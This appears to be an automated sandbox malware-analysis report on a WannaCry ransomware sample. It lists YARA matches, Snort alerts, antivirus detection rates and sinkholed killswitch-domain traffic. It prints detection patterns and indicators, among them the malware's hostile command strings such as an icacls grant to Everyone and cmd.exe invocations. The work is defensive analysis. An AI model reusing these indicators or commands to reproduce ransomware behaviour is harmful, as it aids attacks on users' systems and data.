0.0.MSNRf9dZ63.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.MSNRf9dZ63.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x31f5a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x31f57c:$x3: tasksche.exe 0x31f558:$x4: Global\MsWinZonesCacheCounterMutexA 0x31f5d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x31f5a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x31f4d0:$s3: cmd.exe /c "%s" 0x351a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x312aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x312780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x31236c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.MSNRf9dZ63.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.MSNRf9dZ63.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x31f57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x31f5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.MSNRf9dZ63.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x3120ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x31785e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.MSNRf9dZ63.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x31f5a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x31f57c:$x3: tasksche.exe 0x31f558:$x4: Global\MsWinZonesCacheCounterMutexA 0x31f5d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x31f5a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x31f4d0:$s3: cmd.exe /c "%s" 0x351a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x312aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x312780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x31236c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.MSNRf9dZ63.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.MSNRf9dZ63.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x31f57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x31f5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.MSNRf9dZ63.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x3120ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x31785e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.MSNRf9dZ63.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x31f5a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x31f57c:$x3: tasksche.exe 0x31f558:$x4: Global\MsWinZonesCacheCounterMutexA 0x31f5d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x31f5a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x31f4d0:$s3: cmd.exe /c "%s" 0x351a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x312aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x312780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x31236c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.MSNRf9dZ63.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.MSNRf9dZ63.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x31f57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x31f5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.MSNRf9dZ63.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x3120ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x31785e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.MSNRf9dZ63.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x31f5a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x31f57c:$x3: tasksche.exe 0x31f558:$x4: Global\MsWinZonesCacheCounterMutexA 0x31f5d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x31f5a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x31f4d0:$s3: cmd.exe /c "%s" 0x351a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x312aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x312780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x31236c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.MSNRf9dZ63.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.MSNRf9dZ63.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x31f57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x31f5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.MSNRf9dZ63.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x3120ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x31785e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Click to see the 41 entries

Snort Signatures

ET TROJAN Possible WannaCry DNS Lookup 1 - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.859477532024291 10/12/22-06:23:13.693284
SID:	2024291
Source Port:	59477
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Kryptos Logic - Source IP: 104.16.173.80 - Destination IP: 192.168.2.7

Timestamp:	104.16.173.80192.168.2.780496992031515 10/12/22-06:23:12.540467
SID:	2031515
Source Port:	80
Destination Port:	49699
Protocol:	TCP
Classtype:	Misc activity

ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 - Source IP: 192.168.2.7 - Destination IP: 104.16.173.80

Timestamp:	192.168.2.7104.16.173.8049700802024298 10/12/22-06:23:13.761402
SID:	2024298
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 - Source IP: 192.168.2.7 - Destination IP: 104.16.173.80

Timestamp:	192.168.2.7104.16.173.8049699802024298 10/12/22-06:23:12.511053
SID:	2024298
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Kryptos Logic - Source IP: 104.16.173.80 - Destination IP: 192.168.2.7

Timestamp:	104.16.173.80192.168.2.780497002031515 10/12/22-06:23:13.791210
SID:	2031515
Source Port:	80
Destination Port:	49700
Protocol:	TCP
Classtype:	Misc activity

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: MSNRf9dZ63.exe	ReversingLabs: Detection: 96%
Source: MSNRf9dZ63.exe	Virustotal: Detection: 83%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: MSNRf9dZ63.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Virustotal: Detection: 15%

Perma Link

Antivirus detection for dropped file

Source: C:\Windows\tasksche.exe

Avira: detection malicious, Label: TR/AD.WannaCry.sewvt

Multi AV Scanner detection for dropped file

Source: C:\Windows\tasksche.exe	ReversingLabs: Detection: 97%
Source: C:\Windows\tasksche.exe	Metadefender: Detection: 88%			Perma Link

Machine Learning detection for sample

Source: MSNRf9dZ63.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Windows\tasksche.exe

Joe Sandbox ML: detected

Source: 2.2.tasksche.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 2.0.tasksche.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt

Source: C:\Windows\tasksche.exe

Code function: 2_2_004018B9 CryptReleaseContext,

2_2_004018B9

Source: MSNRf9dZ63.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Networking

Tries to download HTTP data from a sinkholed server

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 Oct 2022 04:23:12 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 758d0f0f39c49b9e-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 Oct 2022 04:23:13 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 758d0f17080b9a15-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.7:59477 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49699 -> 104.16.173.80:80
Source: Traffic	Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49699
Source: Traffic	Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49700 -> 104.16.173.80:80
Source: Traffic	Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49700

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

